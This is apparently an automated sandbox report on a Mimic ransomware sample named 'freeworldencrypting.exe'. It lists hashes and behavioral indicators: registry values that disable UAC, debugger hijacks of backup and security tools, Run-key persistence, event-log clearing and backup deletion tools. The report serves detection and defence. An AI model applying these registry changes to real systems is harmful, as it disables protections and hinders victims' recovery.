Overview
overview
10Static
static
10samples.zip
windows7-x64
1samples.zip
windows10-2004-x64
1samples/$I30
windows7-x64
1samples/$I30
windows10-2004-x64
1samples/Everything.db
windows7-x64
3samples/Everything.db
windows10-2004-x64
3samples/Ev...eslack
windows7-x64
3samples/Ev...eslack
windows10-2004-x64
3samples/Ev...ng.exe
windows7-x64
6samples/Ev...ng.exe
windows10-2004-x64
6samples/Ev...ng.ini
windows7-x64
1samples/Ev...ng.ini
windows10-2004-x64
1samples/Ev...eslack
windows7-x64
3samples/Ev...eslack
windows10-2004-x64
3samples/Ev...32.dll
windows7-x64
3samples/Ev...32.dll
windows10-2004-x64
3samples/Ev...eslack
windows7-x64
3samples/Ev...eslack
windows10-2004-x64
3samples/Ev...g64.7z
windows7-x64
3samples/Ev...g64.7z
windows10-2004-x64
3samples/fr...ng.exe
windows7-x64
10samples/fr...ng.exe
windows10-2004-x64
10samples/session.tmp
windows7-x64
3samples/session.tmp
windows10-2004-x64
3Analysis
-
max time kernel
676s -
max time network
1150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2024 14:34
Behavioral task
behavioral1
Sample
samples.zip
Resource
win7-20240903-en
windows7-x64
0 signatures
1200 seconds
Behavioral task
behavioral2
Sample
samples.zip
Resource
win10v2004-20240802-en
windows10-2004-x64
0 signatures
1200 seconds
Behavioral task
behavioral3
Sample
samples/$I30
Resource
win7-20240903-en
windows7-x64
0 signatures
1200 seconds
Behavioral task
behavioral4
Sample
samples/$I30
Resource
win10v2004-20240802-en
windows10-2004-x64
0 signatures
1200 seconds
Behavioral task
behavioral5
Sample
samples/Everything.db
Resource
win7-20240704-en
windows7-x64
1 signatures
1200 seconds
Behavioral task
behavioral6
Sample
samples/Everything.db
Resource
win10v2004-20240802-en
windows10-2004-x64
1 signatures
1200 seconds
Behavioral task
behavioral7
Sample
samples/Everything.db.fileslack
Resource
win7-20240903-en
windows7-x64
6 signatures
1200 seconds
Behavioral task
behavioral8
Sample
samples/Everything.db.fileslack
Resource
win10v2004-20240802-en
windows10-2004-x64
3 signatures
1200 seconds
Behavioral task
behavioral9
Sample
samples/Everything.exe
Resource
win7-20240903-en
windows7-x64
3 signatures
1200 seconds
Behavioral task
behavioral10
Sample
samples/Everything.exe
Resource
win10v2004-20240802-en
windows10-2004-x64
3 signatures
1200 seconds
Behavioral task
behavioral11
Sample
samples/Everything.ini
Resource
win7-20240903-en
windows7-x64
1 signatures
1200 seconds
Behavioral task
behavioral12
Sample
samples/Everything.ini
Resource
win10v2004-20240802-en
windows10-2004-x64
1 signatures
1200 seconds
Behavioral task
behavioral13
Sample
samples/Everything.ini.fileslack
Resource
win7-20240903-en
windows7-x64
6 signatures
1200 seconds
Behavioral task
behavioral14
Sample
samples/Everything.ini.fileslack
Resource
win10v2004-20240802-en
windows10-2004-x64
3 signatures
1200 seconds
Behavioral task
behavioral15
Sample
samples/Everything32.dll
Resource
win7-20240704-en
windows7-x64
2 signatures
1200 seconds
Behavioral task
behavioral16
Sample
samples/Everything32.dll
Resource
win10v2004-20240802-en
windows10-2004-x64
2 signatures
1200 seconds
Behavioral task
behavioral17
Sample
samples/Everything32.dll.fileslack
Resource
win7-20240708-en
windows7-x64
6 signatures
1200 seconds
Behavioral task
behavioral18
Sample
samples/Everything32.dll.fileslack
Resource
win10v2004-20240802-en
windows10-2004-x64
3 signatures
1200 seconds
Behavioral task
behavioral19
Sample
samples/Everything64.7z
Resource
win7-20240903-en
windows7-x64
6 signatures
1200 seconds
Behavioral task
behavioral20
Sample
samples/Everything64.7z
Resource
win10v2004-20240802-en
windows10-2004-x64
3 signatures
1200 seconds
Behavioral task
behavioral21
Sample
samples/freeworldencrypting.exe
Resource
win7-20240903-en
windows7-x64
20 signatures
1200 seconds
Behavioral task
behavioral22
Sample
samples/freeworldencrypting.exe
Resource
win10v2004-20240802-en
windows10-2004-x64
31 signatures
1200 seconds
Behavioral task
behavioral23
Sample
samples/session.tmp
Resource
win7-20240903-en
windows7-x64
6 signatures
1200 seconds
Behavioral task
behavioral24
Sample
samples/session.tmp
Resource
win10v2004-20240802-en
windows10-2004-x64
3 signatures
1200 seconds
General
-
Target
samples/freeworldencrypting.exe
-
Size
2.0MB
-
MD5
22c109d5539b862d629daa01673352cd
-
SHA1
2eed43bf7f139243d9ef93bf4ed0903ced8a08b5
-
SHA256
f5a331009d6e46236036c2de3578f2a8414742271ed4b23496859c8b99f5c4de
-
SHA512
3d251c3c633f24b1ddf7d1f5dcf8a2c8093c892c0a1e5577aec8dc01fcf50aebdc0d481c96f65d83dadd7a7873c2e8013761b16728bd5f6e3621977b2ae46bc2
-
SSDEEP
49152:wa/RPnb1b+uL5KTu8l6VP/DOdmGtPY4ldP1nKESY:wa/RTd56M9/DmmGmMP
Malware Config
Signatures
-
Detects Mimic ransomware 1 IoCs
resource yara_rule behavioral22/files/0x00070000000234e5-23.dat family_mimic -
Mimic
Ransomware family was first exploited in the wild in 2022.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" freeworldencrypting.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 4420 wevtutil.exe 2068 wevtutil.exe 1300 wevtutil.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4144 bcdedit.exe 4272 bcdedit.exe -
pid Process 4380 wbadmin.exe -
pid Process 4812 wbadmin.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqbcoreservice.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlwriter.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TeamViewer.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bengien.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CoreSync.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mydesktopservice.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBW32.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsa_service.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocomm.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oracle.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAgui.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\benetns.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\beserver.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Creative Cloud.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\httpd.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutodeskDesktopApp.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchApp.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBDBMgr.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxServer.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CoreSync.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\encsvc.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\encsvc.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msaccess.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tbirdconfig.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsDtSrvr.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsDtSrvr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oracle.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBDBMgrN.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VeeamDeploymentSvc.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SimplyConnectionManager.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TeamViewer_Service.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tv_w32.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bedbh.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EnterpriseClient.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mysqld.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\node.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TeamViewer_Service.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdswfsafe.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxServerView.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mysqld-nt.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocautoupds.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wpython.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineSettings.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EnterpriseClient.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msftesql.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBW32.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tomcat6.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocautoupds.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineSettings.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocomm.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\java.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qbupdate.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineElevatedCfg.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\agntsvc.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBIDPService.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VeeamDeploymentSvc.exe freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ssms.exe freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbeng50.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspub.exe freeworldencrypting.exe -
Executes dropped EXE 6 IoCs
pid Process 924 freeworldencrypting.exe 2144 freeworldencrypting.exe 3216 freeworldencrypting.exe 3640 freeworldencrypting.exe 892 Everything.exe 4260 Everything.exe -
Loads dropped DLL 4 IoCs
pid Process 924 freeworldencrypting.exe 2144 freeworldencrypting.exe 3216 freeworldencrypting.exe 3640 freeworldencrypting.exe -
Modifies system executable filetype association 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" freeworldencrypting.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" freeworldencrypting.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open\command freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" freeworldencrypting.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell freeworldencrypting.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open freeworldencrypting.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" freeworldencrypting.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command freeworldencrypting.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open\command freeworldencrypting.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\freeworldencrypting = "\"C:\\Users\\Admin\\AppData\\Local\\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\\freeworldencrypting.exe\" " freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\freeworldencrypting.exe = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\HACKLENDINIZ.txt\"" freeworldencrypting.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" freeworldencrypting.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: Everything.exe File opened (read-only) \??\X: Everything.exe File opened (read-only) \??\Y: Everything.exe File opened (read-only) \??\A: Everything.exe File opened (read-only) \??\B: Everything.exe File opened (read-only) \??\P: Everything.exe File opened (read-only) \??\R: Everything.exe File opened (read-only) \??\M: Everything.exe File opened (read-only) \??\E: Everything.exe File opened (read-only) \??\G: Everything.exe File opened (read-only) \??\L: Everything.exe File opened (read-only) \??\W: Everything.exe File opened (read-only) \??\N: Everything.exe File opened (read-only) \??\J: Everything.exe File opened (read-only) \??\O: Everything.exe File opened (read-only) \??\O: Everything.exe File opened (read-only) \??\Q: Everything.exe File opened (read-only) \??\U: Everything.exe File opened (read-only) \??\X: Everything.exe File opened (read-only) \??\Y: Everything.exe File opened (read-only) \??\I: Everything.exe File opened (read-only) \??\J: Everything.exe File opened (read-only) \??\L: Everything.exe File opened (read-only) \??\T: Everything.exe File opened (read-only) \??\I: Everything.exe File opened (read-only) \??\N: Everything.exe File opened (read-only) \??\Z: Everything.exe File opened (read-only) \??\S: Everything.exe File opened (read-only) \??\B: Everything.exe File opened (read-only) \??\K: Everything.exe File opened (read-only) \??\P: Everything.exe File opened (read-only) \??\Q: Everything.exe File opened (read-only) \??\U: Everything.exe File opened (read-only) \??\V: Everything.exe File opened (read-only) \??\K: Everything.exe File opened (read-only) \??\T: Everything.exe File opened (read-only) \??\E: Everything.exe File opened (read-only) \??\H: Everything.exe File opened (read-only) \??\V: Everything.exe File opened (read-only) \??\G: Everything.exe File opened (read-only) \??\R: Everything.exe File opened (read-only) \??\S: Everything.exe File opened (read-only) \??\W: Everything.exe File opened (read-only) \??\Z: Everything.exe File opened (read-only) \??\H: Everything.exe File opened (read-only) \??\M: Everything.exe -
Power Settings 1 TTPs 15 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3524 powercfg.exe 2236 powercfg.exe 1412 powercfg.exe 1160 powercfg.exe 224 powercfg.exe 5076 powercfg.exe 2448 powercfg.exe 4676 powercfg.exe 3480 powercfg.exe 3768 powercfg.exe 3888 powercfg.exe 396 powercfg.exe 1796 powercfg.exe 2020 powercfg.exe 116 powercfg.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe -
pid Process 2300 powershell.exe 4988 powershell.exe 3616 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freeworldencrypting.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freeworldencrypting.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freeworldencrypting.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freeworldencrypting.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Everything.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freeworldencrypting.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Everything.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1844 cmd.exe 4052 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Modifies registry class 19 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open freeworldencrypting.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command freeworldencrypting.exe Key created \REGISTRY\MACHINE\Software\Classes\.EncryptedDATA freeworldencrypting.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command freeworldencrypting.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open\command freeworldencrypting.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile freeworldencrypting.exe Key created \REGISTRY\MACHINE\Software\Classes\mimicfile\shell\open\command freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\HACKLENDINIZ.txt\"" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" freeworldencrypting.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" freeworldencrypting.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" freeworldencrypting.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell\open\command freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.EncryptedDATA\ = "mimicfile" freeworldencrypting.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\exefile\shell freeworldencrypting.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1004 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4052 PING.EXE -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe 3216 freeworldencrypting.exe 3216 freeworldencrypting.exe 3640 freeworldencrypting.exe 3640 freeworldencrypting.exe 2300 powershell.exe 4988 powershell.exe 3616 powershell.exe 4988 powershell.exe 2300 powershell.exe 3616 powershell.exe 924 freeworldencrypting.exe 924 freeworldencrypting.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
